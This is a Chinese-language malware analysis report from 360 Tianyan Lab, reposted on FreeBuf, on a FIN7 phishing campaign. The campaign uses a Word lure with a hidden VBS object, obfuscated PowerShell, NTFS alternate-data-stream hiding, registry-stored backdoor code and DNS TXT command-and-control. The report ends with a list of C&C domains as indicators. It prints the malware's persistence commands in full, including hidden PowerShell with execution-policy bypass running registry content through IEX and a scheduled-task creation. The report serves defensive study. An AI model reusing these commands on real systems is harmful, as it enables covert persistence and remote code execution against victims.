信息來(lái)源：FreeBuf

事件背景

2017年3月，F(xiàn)ireEye發(fā)布了一篇名黑客組織FIN7的APT攻擊簡(jiǎn)報(bào)，報(bào)告稱(chēng)FIN7組織以釣魚(yú)郵件為攻擊渠道，主要對(duì)美國(guó)金融機(jī)構(gòu)滲透攻擊。組織的攻擊利用DNS協(xié)議的TXT字段進(jìn)行C&C通信。360威脅情報(bào)中心對(duì)此APT組織的攻擊鏈條進(jìn)行了梳理，對(duì)木馬相關(guān)的技術(shù)進(jìn)行了分析，揭示其一些有意思的技巧。

目標(biāo)樣本

Hash	d04b6410dddee19adec75f597c52e386
文件類(lèi)型	Word文檔
文件大小	1,834,496字節(jié)

攻擊特點(diǎn)與攻擊流程

FIN7攻擊特點(diǎn)主要體現(xiàn)在：

1. 全部攻擊過(guò)程使用非PE實(shí)現(xiàn)，釣魚(yú)使用doc文件，后門(mén)使用powershell文件。

2. 使用ADS數(shù)據(jù)隱藏保存在磁盤(pán)中的非PE文件

3. 后門(mén)文件保存在注冊(cè)表中，功能由Powershell實(shí)現(xiàn)

4. 與C&C通信使用DNS協(xié)議的TXT記錄

5. C&C地址從64個(gè)硬編碼的地址中隨機(jī)選擇

攻擊流程：

在整個(gè)攻擊過(guò)程中，沒(méi)有使用到PE文件，這在一定程度上躲避了安全軟件的查殺。落地的文件也進(jìn)行了技術(shù)上的隱藏，而真正的后門(mén)程序卻已加密的方式存儲(chǔ)在注冊(cè)表中。

攻擊者以釣魚(yú)郵件為進(jìn)入渠道，在惡意文檔中嵌入vbs腳本，vbs腳本運(yùn)行后解密后門(mén)程序?qū)懭胱?cè)表中，同時(shí)將調(diào)用后門(mén)程序的腳本以ads隱藏在磁盤(pán)文件中。在后門(mén)運(yùn)行后，使用DNS TXT做為C&C通信方式。

樣本分析

釣魚(yú)郵件打開(kāi)后，顯示如下圖所示，可以看到，文檔中插入了一張圖片，圖片字體顯示模糊。

 

通過(guò)分析，得到了釣魚(yú)文檔的制作過(guò)程：分別插入了一個(gè)vbs的OLE對(duì)象與一張字跡模糊的圖片，將OLE對(duì)象的圖標(biāo)設(shè)置為透明圖標(biāo)并置入圖片對(duì)象的頂層，最將兩個(gè)對(duì)象組合到一起，這樣就達(dá)到了雙擊圖片，實(shí)際上運(yùn)行了vbs腳本的目的。 

雙擊圖片，就會(huì)打開(kāi)vbs腳本，只有當(dāng)用戶(hù)點(diǎn)擊彈出的對(duì)話框中的確定后，才會(huì)運(yùn)行vbs腳本，如果在這時(shí)，用戶(hù)點(diǎn)擊了取消，就可以阻斷這次攻擊。

為了誘導(dǎo)用戶(hù)雙擊圖片運(yùn)行vbs腳本，文檔中還寫(xiě)入“This document is protected by Microsoft Office and requires human verification Please Enable Editing and Double Click on page below.”（文檔被Microsoft Office 保護(hù)，請(qǐng)啟用編輯并雙擊下面的圖片）。

VBS功能：

當(dāng)上面的圖片被雙擊運(yùn)行后，程序后臺(tái)會(huì)運(yùn)行VBS腳本，該腳本功能為：調(diào)用powershell解密一大段字符，從代碼中可以看出，解密出來(lái)的為一gz文件，因此可以將這大段base64解密后，保存成gz格式，使用解壓工具得到壓縮文件繼續(xù)分析。

樣本加載感染過(guò)程：

gz中的文件也是一個(gè)powershell腳本。腳本經(jīng)過(guò)混淆，實(shí)現(xiàn)的功能是：判斷當(dāng)前用戶(hù)是不是administartor權(quán)限，根據(jù)不同的權(quán)限寫(xiě)入不同的注冊(cè)表內(nèi)容，這些內(nèi)容為開(kāi)機(jī)后會(huì)解密執(zhí)行的代碼，隨后通過(guò)ADS將加載注冊(cè)表內(nèi)容的vbs腳本寫(xiě)入C:\ProgramData\windows :CtxDnsClient.vbs文件中，并將該文件加入啟動(dòng)項(xiàng)和計(jì)劃任務(wù)中。

 原始的powershell內(nèi)容，可以看到powershell腳本經(jīng)過(guò)了混淆：

后門(mén)程序?qū)懭胱?cè)表

Powershell寫(xiě)入到注冊(cè)表中的后門(mén)程序的內(nèi)容如下：

ADS隱藏磁盤(pán)文件

將要實(shí)現(xiàn)開(kāi)機(jī)啟動(dòng)的文件寫(xiě)入到磁盤(pán)文件C:\ProgramData\Windows:CtxDnsClient.vbs中。

對(duì)于Windows:CtxDnsClient.vbs文件，使用了ADS數(shù)據(jù)隱藏技術(shù)。而通過(guò)ADS隱藏的數(shù)據(jù)在Windows系統(tǒng)中無(wú)法顯示，文件大小也顯示為0字節(jié)：

 

但是使用dir /r命令，可以看到ADS中有隱藏的數(shù)據(jù)

 

啟動(dòng)項(xiàng)中的隱藏的ads數(shù)據(jù)，dump出來(lái)后顯示如下：

 

使用 ADS中隱藏?cái)?shù)據(jù)內(nèi)容為：

cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs" 

cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass 

-C IEX ((Get-ItemProperty -Path HKCU:Software\Microsoft\Windows).Part)"",0 >> C:\ProgramData\Windows:CtxDnsClient.vbs"

添加開(kāi)機(jī)啟動(dòng)

創(chuàng)建的啟動(dòng)項(xiàng)，啟動(dòng)項(xiàng)位置為HKCU\Software\Microsoft\Windows\CurrentVersion\Run\：

添加計(jì)劃任務(wù)：

schtasks.exe /F /create /tn CtxDnsClient /tr 

"C:\Windows\System32\wscript.exe C:\ProgramData\Windows:CtxDnsClient.vbs " /sc onidle /i 30

通過(guò)上面這些過(guò)程，來(lái)實(shí)現(xiàn)程序的自啟動(dòng)。在系統(tǒng)重新啟動(dòng)后，啟動(dòng)項(xiàng)中的wscript.exe會(huì)加載Windows:CtxDnsClient.vbs，Windows:CtxDnsClient.vbs中會(huì)使用powershell加載HKCU\Software\Microsoft\Windows \Part內(nèi)容，part中實(shí)現(xiàn)的功能會(huì)加載注冊(cè)表相同位置下的CtxDnsClient的內(nèi)容。這里的內(nèi)容就是真正的實(shí)現(xiàn)CC的功能。

C&C通信功能

這部分功能主要在注冊(cè)表中的HKCU\Software\Microsoft\Windows下 CtxDnsClient的內(nèi)容中，主要功能為：從內(nèi)置的64個(gè)域名中隨機(jī)選擇一個(gè)，查詢(xún)?cè)撚蛎腟PF記錄，用來(lái)實(shí)現(xiàn)自己的C&C通信。

創(chuàng)建名為”SourceFireSux”的互斥體，防止程序重復(fù)運(yùn)行：

編碼過(guò)的64個(gè)域名地址代碼片段：

 

 

從這64個(gè)域名中，隨機(jī)選取一個(gè)（如這里隨機(jī)被選擇到的為：pbbk.us），加上www前綴，查詢(xún)對(duì)應(yīng)DNS TXT記錄內(nèi)容（即查詢(xún)www.pbbk.us的dns txt記錄）。

如果返回的內(nèi)容為idle，則程序睡眠3.5秒到5.4秒的隨機(jī)時(shí)間。

如果返回的內(nèi)容為www，則表明這個(gè)域名現(xiàn)在正在攻擊者控制之中，隨后查詢(xún)mail.pbbk.us的dns txt記錄。

隨后mail.pbbk.us返回的內(nèi)容就被 powershell直接通過(guò)IEX調(diào)用執(zhí)行。

IOC

木馬嘗試通信的C&C地址：

域名	注冊(cè)人	注冊(cè)時(shí)間	備注
www.grij.us	Frank Walters	2017/2/19 3:09
www.kwoe.us	Frank Walters	2017/2/19 3:09
www.zugh.us	Frank Walters	2017/2/19 3:09
www.pafk.us	Frank Walters	2017/2/19 3:09
www.cuuo.us	Frank Walters	2017/2/19 3:07
www.ooyh.us	Frank Walters	2017/2/19 3:07
www.vxqt.us	Frank Walters	2017/2/19 3:06
www.cgqy.us	Frank Walters	2017/2/19 3:07
www.wfsv.us	Frank Walters	2017/2/19 3:07
www.palj.us	Frank Walters	2017/2/19 3:09
www.idjb.us	Frank Walters	2017/2/19 3:09
www.zjav.us	Frank Walters	2017/2/19 3:09
www.mewt.us	Frank Walters	2017/2/19 3:06
www.vkpo.us	Frank Walters	2017/2/19 3:07
www.wqiy.info	WhoisGuard Protected	2017/2/18 19:08
www.wvzu.pw	WhoisGuard Protected	2017/2/18 0:00
www.gxhp.top	WhoisGuard Protected	2017/2/18 19:07
www.hvzr.info	WhoisGuard Protected	2017/2/18 19:07
www.reld.info	WhoisGuard Protected	2017/2/18 0:00
www.vqba.info	WhoisGuard Protected	2017/2/18 19:06
www.oxrp.info	WhoisGuard Protected	2017/2/18 19:08
www.dvso.pw	WhoisGuard Protected	2017/2/18 0:00
www.bvyv.club
www.bwuk.club
www.cihr.site
www.coec.club
www.oyaw.club
www.pbbk.us
www.ppdx.pw
www.pvze.club
www.qefg.info
www.qlpa.club
www.ueox.club
www.ufyb.club
www.dbxa.pw
www.eady.club
www.enuv.club
www.eter.pw
www.utca.site
www.vdfe.site
www.vjro.club
www.fbjz.pw
www.fhyi.club
www.futh.pw
www.gnoa.pw
www.vwcq.us
www.jimw.club
www.jomp.site
www.jxhv.site
www.kshv.site
www.ysxy.pw
www.zmyo.club
www.zody.pw
www.lhlv.club
www.lnoy.site
www.lvrm.pw
www.mfka.pw
www.nxpu.site
www.oaax.site
www.odyr.us
www.oknz.club
www.ooep.pw
www.ckwl.pw	Lin Shi Mo Ban	2015/11/11 0:00	不能作為IOC
www.zcnt.pw	Lin Shi Mo Ban	2015/11/16 0:00	不能作為IOC

參考鏈接

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

*本文作者：360天眼實(shí)驗(yàn)室，轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf.COM